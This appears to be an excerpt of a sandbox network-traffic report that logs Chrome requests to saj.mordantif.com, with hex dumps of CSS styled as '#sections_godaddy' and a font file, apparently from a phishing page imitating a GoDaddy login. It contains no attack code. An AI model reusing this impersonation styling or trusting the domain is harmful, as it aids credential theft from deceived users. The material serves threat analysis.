                                                        2024-09-13 13:07:06 UTC1369INData Raw: 74 6f 7b 6f 70 61 63 69 74 79 3a 2e 34 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 6f 75 74 66 6f 72 6d 7b 66 72 6f 6d 7b 6f 70 61 63 69 74 79 3a 2e 34 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 31 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 75 6e 73 65 74 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 70 72 6f 67 72 65 73 73 44 6f 74 7b 30 25 2c 32 30 25 7b 6c 65 66 74 3a 30 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65 61 73 65 2d 6f 75 74 3b 6f 70 61 63 69 74 79 3a 30 7d 32 35 25 2c 37 35 25 7b 6f 70 61 63 69 74 79 3a 31 7d 33 35 25 7b 6c 65 66 74 3a 34 35 25 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d
                                                        Data Ascii: to{opacity:.4;pointer-events:none}}@keyframes fadeoutform{from{opacity:.4;pointer-events:none}to{opacity:1;pointer-events:unset}}@keyframes progressDot{0%,20%{left:0;animation-timing-function:ease-out;opacity:0}25%,75%{opacity:1}35%{left:45%;animation-tim
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 6c 6f 61 74 69 6e 67 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2e 33 35 73 7d 23 73 65 63 74 69 6f 6e 73 20 2e 6c 6f 61 64 69 6e 67 2d 63 6f 6e 74 61 69 6e 65 72 2e 6c 6f 61 64 69 6e 67 20 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 6e 74 68 2d 63 68 69 6c 64 28 34 29 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2e 35 73 7d 23 73 65 63 74 69 6f 6e 73 20 2e 6c 6f 61 64 69 6e 67 2d 63 6f 6e 74 61 69 6e 65 72 2e 6c 6f 61 64 69 6e 67 20 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 6e 74 68 2d 63 68 69 6c 64 28 35 29 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2e 36 35 73 7d 23 73 65 63 74 69 6f 6e 73 7b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 77 69 64 74 68 3a 31 30 30 76 77 3b 64 69 73 70 6c 61 79 3a 74
                                                        Data Ascii: loating:nth-child(3){animation-delay:.35s}#sections .loading-container.loading .dot-floating:nth-child(4){animation-delay:.5s}#sections .loading-container.loading .dot-floating:nth-child(5){animation-delay:.65s}#sections{height:100vh;width:100vw;display:t
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 36 70 78 20 31 30 70 78 20 36 70 78 20 30 3b 62 6f 72 64 65 72 3a 32 70 78 20 73 6f 6c 69 64 20 23 36 36 36 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 20 30 20 31 70 78 3b 68 65 69 67 68 74 3a 33 36 70 78 3b 6f 75 74 6c 69 6e 65 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 32 30 70 78 29 7d 2e 69 6e 70 75 74 3a 68 6f 76 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 3a 68 6f 76 65 72 2c 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30
                                                        Data Ascii: 6px 10px 6px 0;border:2px solid #666;border-width:0 0 1px;height:36px;outline:0;border-radius:0;-webkit-border-radius:0;background-color:transparent;width:calc(100% - 20px)}.input:hover,input[type=email]:hover,input[type=tel]:hover{border-color:rgba(0,0,0
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 6c 61 73 74 2d 63 68 69 6c 64 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 30 7d 2e 61 6c 65 72 74 2d 65 72 72 6f 72 7b 63 6f 6c 6f 72 3a 23 65 38 31 31 32 33 7d 69 6e 70 75 74 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2b 6c 61 62 65 6c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 7d 2e 64 69 72 6c 74 72 7b 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 7d 2e 69 6e 70 75 74 2d 6d 61 78 2d 77 69 64 74 68 7b 6d 61 78 2d 77 69 64 74 68 3a 36 34 30 70 78 7d 2e 74 61 62 6c 65 2c 69 6e 70 75 74 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 6c 61 62 65 6c 2e 69 6e
                                                        Data Ascii: last-child{border-bottom-left-radius:0;border-top-left-radius:0;border-left:0}.alert-error{color:#e81123}input.form-control+label.input-group-addon{border-radius:0}.dirltr{direction:ltr}.input-max-width{max-width:640px}.table,input{max-width:100%}label.in


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        42192.168.2.549779172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:05 UTC1367OUTGET /abPT4sUgOrsEgh28 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6T
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:06 UTC622INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:06 GMT
                                                        Content-Type: text/css;charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Content-Disposition: inline; filename="abPT4sUgOrsEgh28"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zcWLameFyEeHNgnRianYSFOwajJaPhil0YfkhyAphgqnNkj6uooHgiXxSLfhrgrocBSZk2HhBrlqQzUxXXhAqCDfE8CDwGQ5qm56yYsSAfHRJnafPZ8iTdk4mDH2Vw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bb7c9868cda-EWR
                                                        2024-09-13 13:07:06 UTC747INData Raw: 33 37 61 32 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 7b 0d 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 67 64 73 68 65 72 70 61 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 61 20 7b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 32 72 71 61 70 77 2c 23 30 30 30 29 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 37 69 66 35 70 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 37 69 66 35 70 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72
                                                        Data Ascii: 37a2#sections_godaddy {font-family: gdsherpa !important;}#sections_godaddy a { color: var(--ux-2rqapw,#000); -webkit-text-decoration: var(--ux-1f7if5p,underline); text-decoration: var(--ux-1f7if5p,underline); background-color: transpar
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 37 69 66 35 70 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 20 20 67 61 70 3a 20 30 2e 35 65 6d 3b 0d 0a 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0d 0a 20 20 2d 2d 75 78 2d 62 75 74 74 6f 6e 2d 69 63 6f 6e 2d 6d 61 72 67 69 6e 3a 20 63 61 6c 63 28 28 76 61 72 28 2d 2d 75 78 2d 74 33 37 39 6f 76 2c 76 61 72 28 2d 2d 75 78 2d 6a 77 35 73 39 6a 2c 31 2e 35 29 29 20 2a 20 31 65 6d 20 2d 20 31 2e 35 65 6d 29 20 2f 20 32 29 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 69 6e 68 65 72 69 74 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 67
                                                        Data Ascii: ,underline); -webkit-text-decoration: var(--ux-1f7if5p,underline); gap: 0.5em; cursor: pointer; --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2); font-weight: inherit; background: transparent; g
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 7b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 0d 0a 20 20 62 6c 6f 63 6b 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 75 78 53 70 61 63 65 2d 2d 70 61 64 64 69 6e 67 2d 73 69 7a 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 73 70 61 63 65 2e 75 78 2d 73 70 61 63 65 2d 2d 62 6c 6f 63 6b 3a 6e 6f 74 28 3a 65 6d 70 74 79 29 20 7b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 62 6c 6f 63 6b 3a 20 76 61 72 28 2d 2d 75 78 53 70 61 63 65 2d 2d 70 61 64 64 69 6e 67 2d 73 69 7a 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 64 69 61 6c 6f 67 2d 73 68 65 6c 6c 20 7b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 0d 0a 20 20
                                                        Data Ascii: { display: inline-flex; block-size: var(--uxSpace--padding-size);}#sections_godaddy .ux-space.ux-space--block:not(:empty) { padding-block: var(--uxSpace--padding-size);}#sections_godaddy .ux-dialog-shell { display: inline-flex;
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 32 29 20 76 61 72 28 2d 2d 75 78 2d 79 34 70 67 38 7a 2c 2a 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 34 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 33 29 20 76 61 72 28 2d 2d 75 78 2d 79 34 70 67 38 7a 2c 2a 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 35 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 34 29 20 76 61 72 28 2d 2d 75 78 2d 79 34 70 67 38 7a 2c 2a 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d
                                                        Data Ascii: 2) var(--ux-y4pg8z,*) var(--ux-7s4p3v,1.125)); --uxText--fontSize4: calc(var(--uxText--fontSize3) var(--ux-y4pg8z,*) var(--ux-7s4p3v,1.125)); --uxText--fontSize5: calc(var(--uxText--fontSize4) var(--ux-y4pg8z,*) var(--ux-7s4p3v,1.125)); --uxText-
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 64 79 20 2e 75 78 2d 74 65 78 74 2d 69 6e 70 75 74 2d 73 68 65 6c 6c 20 2e 75 78 2d 74 65 78 74 2d 63 61 70 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 36 70 78 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 0d 0a 7d 0d 0a 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 66 69 65 6c 64 2d 66 72 61 6d 65 2e 75 78 2d 66 69 65 6c 64 2d 66 72 61 6d 65 2d 2d 69 6e 76 61 6c 69 64 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 44 42 31 38 30 32 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 61 6c 65 72 74 2e 75 78 2d 61 6c 65 72 74 2d 2d 63 72 69 74 69 63 61 6c 20 7b 0d 0a 20 20 62 61 63
                                                        Data Ascii: dy .ux-text-input-shell .ux-text-caption { margin-top: 6px; font-size: 13px;}#sections_godaddy .ux-field-frame.ux-field-frame--invalid { border-color: #DB1802 !important;}#sections_godaddy .ux-alert.ux-alert--critical { bac
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 20 20 68 65 69 67 68 74 3a 20 31 70 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 63 6c 69 70 3a 20 72 65 63 74 28 30 2c 30 2c 30 2c 30 29 3b 0d 0a 20 20 63 6c 69 70 3a 20 72 65 63 74 28 30 2c 30 2c 30 2c 30 29 3b 0d 0a 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 63 6c 69 70 2d 70 61 74 68 3a 20 69 6e 73 65 74 28 35 30 25 29 3b 0d 0a 20 20 63 6c 69 70 2d 70 61 74 68 3a 20 69 6e 73 65 74 28 35 30 25 29 3b 0d 0a 20 20 62 6f 72 64 65 72 3a 20 30 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 68 32 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 0d 0a 20 20
                                                        Data Ascii: height: 1px; padding: 0; overflow: hidden; -webkit-clip: rect(0,0,0,0); clip: rect(0,0,0,0); white-space: nowrap; -webkit-clip-path: inset(50%); clip-path: inset(50%); border: 0;}#sections_godaddy h2 { margin-top: 0;
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 38 70 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 63 6f 6e 74 61 69 6e 65 72 3a 3a 61 66 74 65 72 20 7b 0d 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0d 0a 20 20 63 6c 65 61 72 3a 20 62 6f 74 68 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 72 6f 77 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 6c 65
                                                        Data Ascii: tions_godaddy .container { margin-left: auto; margin-right: auto; padding-left: 8px; padding-right: 8px;}#sections_godaddy .container::after { content: ""; display: table; clear: both;}#sections_godaddy .row { margin-le
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 63 61 72 64 20 2e 63 61 72 64 2d 62 6c 6f 63 6b 20 7b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 2d 31 73 62 66 69 67 38 2c 2e 32 35 72 65 6d 29 20 2a 20 35 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 66 6f 6e 74 2d 70 72 69 6d 61 72 79 2d 62 6f 6c 64 20 7b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 61 72 28 2d 2d 75 78 2d 31 30 36 37 70 68 39 2c 73 61 6e 73 2d 73 65 72 69 66 29 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 65 72 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 62 75 74 74 6f 6e 3a 6e 6f 74 28 5b 68 72 65 66 5d 29 3e 2a 20 7b 0d 0a 20 20 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 20 6e 6f 6e
                                                        Data Ascii: card .card-block { padding: calc(var(--ux-1sbfig8,.25rem) * 5);}#sections_godaddy .font-primary-bold { font-family: var(--ux-1067ph9,sans-serif); font-weight: bolder;}#sections_godaddy .ux-button:not([href])>* { pointer-events: non
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 37 63 31 2c 23 66 66 66 29 29 3b 0d 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 34 68 76 6f 76 6e 2c 76 61 72 28 2d 2d 75 78 2d 31 78 6c 69 75 68 69 2c 74 72 61 6e 73 70 61 72 65 6e 74 29 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 62 75 74 74 6f 6e 2e 75 78 2d 62 75 74 74 6f 6e 2d 70 72 69 6d 61 72 79 20 7b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0d 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 62 75 74 74 6f 6e 2e 75 78 2d 62 75 74 74 6f 6e 2d 70 72 69 6d 61 72 79 3a 6e 6f 74 28
                                                        Data Ascii: 7c1,#fff)); border-color: var(--ux-4hvovn,var(--ux-1xliuhi,transparent));}#sections_godaddy .ux-button.ux-button-primary { color: #fff; background-color: #000; border-color: #000;}#sections_godaddy .ux-button.ux-button-primary:not(
                                                        2024-09-13 13:07:06 UTC1369INData Raw: 69 6e 65 48 65 69 67 68 74 3a 20 76 61 72 28 2d 2d 75 78 2d 6e 65 6f 75 79 6e 2c 76 61 72 28 2d 2d 75 78 2d 68 6d 31 74 79 37 2c 31 2e 35 29 29 3b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 61 72 28 2d 2d 75 78 2d 6f 35 39 31 79 6a 2c 76 61 72 28 2d 2d 75 78 2d 39 77 74 61 61 33 2c 73 61 6e 73 2d 73 65 72 69 66 29 29 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 76 61 72 28 2d 2d 75 78 2d 31 30 39 35 78 30 64 2c 76 61 72 28 2d 2d 75 78 2d 33 7a 36 63 63 64 2c 34 30 30 29 29 3b 0d 0a 20 20 66 6f 6e 74 2d 76 61 72 69 61 74 69 6f 6e 2d 73 65 74 74 69 6e 67 73 3a 20 76 61 72 28 2d 2d 75 78 2d 6a 31 33 38 78 38 2c 76 61 72 28 2d 2d 75 78 2d 65 37 32 37 74 38 2c 69 6e 68 65 72 69 74 29 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f
                                                        Data Ascii: ineHeight: var(--ux-neouyn,var(--ux-hm1ty7,1.5)); font-family: var(--ux-o591yj,var(--ux-9wtaa3,sans-serif)); font-weight: var(--ux-1095x0d,var(--ux-3z6ccd,400)); font-variation-settings: var(--ux-j138x8,var(--ux-e727t8,inherit));}#sections_


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        43192.168.2.549778172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:05 UTC1392OUTGET /pq4G6HI3Ijg6dT2j1yzOjuv38 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Origin: https://saj.mordantif.com
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: font
                                                        Referer: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6T
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWEiLCJtYWMiOiIxNzQzMDQwYzFlNjM5ZWZlMGI4NzQwN2NlMGY4Njk1NDliZjdjNWU0OGYzZWNiYWJmZDgyZWQzYzg3ZDQ3MDFlIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:06 UTC622INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:06 GMT
                                                        Content-Type: font/woff2
                                                        Content-Length: 28000
                                                        Connection: close
                                                        Content-Disposition: inline; filename="pq4G6HI3Ijg6dT2j1yzOjuv38"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Km7BH8YXMi2AzXGRSI0j3j52%2Fr%2FyBE8dboE3wTcHNI0%2BFN%2B1OKO0qdwDUhqQxf5oUeqAlqc4NBJY0jQMEfmo7Qk843tENjne0PI9pNCJPuDq5ojvNGaUdU21flftKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bb7c87b0cba-EWR
                                                        2024-09-13 13:07:06 UTC747INData Raw: 77 4f 46 32 00 01 00 00 00 00 6d 60 00 10 00 00 00 01 24 08 00 00 6c fd 00 01 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 81 9d 36 1c 89 16 06 60 00 8e 3c 08 3c 09 97 62 11 08 0a 82 bb 24 82 9c 7f 01 36 02 24 03 8e 78 0b 87 3e 00 04 20 05 8c 03 07 97 7b 0c 81 0d 5b 09 10 71 05 6b b7 5d 5d 4f 88 db 06 10 73 b3 fd a9 7c 99 02 6e 8c 9b c7 21 18 d6 5b 3c 3b 10 83 ee e0 50 26 a6 cf 67 ff ff ff bf 21 a9 c8 98 49 27 69 b7 0d 51 01 44 50 d5 df 9f c4 1e 39 02 92 4a a0 06 b7 80 17 c1 39 47 eb 95 e9 98 51 31 28 8b f2 29 4a 6e c6 19 d5 d4 c5 d4 38 59 f3 d2 1b f9 1a 98 29 4a ce 46 0e 63 20 41 96 af 37 6b ab 76 b3 8b e9 32 3d a1 5a ee 6e fa 34 60 12 ed 81 a0 c0 7e 4e 6c a4 81 ef 34 3b aa 91 07 53 f6 6c 7b 77 c7 c7 3a ae 23 d5 ee aa 3d 21 bc 20
                                                        Data Ascii: wOF2m`$lB6`<<b$6$x> {[qk]]Os|n![<;P&g!I'iQDP9J9GQ1()Jn8Y)JFc A7kv2=Zn4`~Nl4;Sl{w:#=!
